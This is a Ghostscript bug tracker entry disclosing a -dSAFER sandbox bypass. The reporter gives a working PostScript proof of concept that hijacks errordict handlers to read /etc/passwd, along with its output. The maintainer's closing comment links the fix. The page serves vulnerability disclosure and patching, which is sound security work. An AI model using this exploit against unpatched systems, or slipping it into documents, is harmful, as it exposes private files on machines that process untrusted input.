Bug 699658 - Bypassing PermitFileReading by handling undefinedfilename errors
Summary: Bypassing PermitFileReading by handling undefinedfilename errors
Status: NOTIFIED FIXED
Alias: None
Product: Ghostscript
Classification: Unclassified
Component: General (show other bugs)
Version: unspecified
Hardware: PC Linux
: P2 major
Assignee: Chris Liddell (chrisl)
QA Contact: gs-security
URL:
Keywords:
: 699662 (view as bug list)
Depends on:
Blocks:
 
Reported: 2018-08-21 18:03 UTC by Tavis Ormandy
Modified: 2018-12-18 11:37 UTC (History)
6 users (show)

See Also:
Customer: 501,641
Word Size: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Tavis Ormandy 2018-08-21 18:03:14 UTC
If you handle /undefinedfilename, you can provide a filename to pseudo operators that is outside of PermitFileReading. Getting the contents is tricky, but here is a demo:

$ cat fileread.ps
/FileToSteal (/etc/passwd) def
errordict /undefinedfilename {
    FileToSteal % save the undefined name
} put
errordict /undefined {
    (STOLEN: ) print
    counttomark {
        ==only
    } repeat
    (\n) print
    FileToSteal
} put
errordict /invalidfileaccess {
    pop
} put
errordict /typecheck {
    pop
} put
FileToSteal (w) .tempfile
statusdict
begin
    1 1 .setpagesize
end
quit
$ gs -q -sDEVICE=ppmraw -dSAFER  fileread.ps
GPL Ghostscript 9.23:
STOLEN: root:x:0:0:root:
STOLEN: daemon:x:1:1:daemon:/bash/bin/root:(/etc/passwd)
STOLEN: bin:x:2:2:bin:/nologin/sbin/usr/sbin:/usr(/etc/passwd)
STOLEN: sys:x:3:3:sys:/nologin/sbin/usr/bin:(/etc/passwd)
STOLEN: sync:x:4:65534:sync:/nologin/sbin/usr/dev:(/etc/passwd)
STOLEN: games:x:5:60:games:/sync/bin/bin:(/etc/passwd)
Comment 1 Chris Liddell (chrisl) 2018-08-23 09:28:27 UTC
*** Bug 699662 has been marked as a duplicate of this bug. ***
Comment 2 Chris Liddell (chrisl) 2018-08-23 11:43:39 UTC
Fixed in:

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42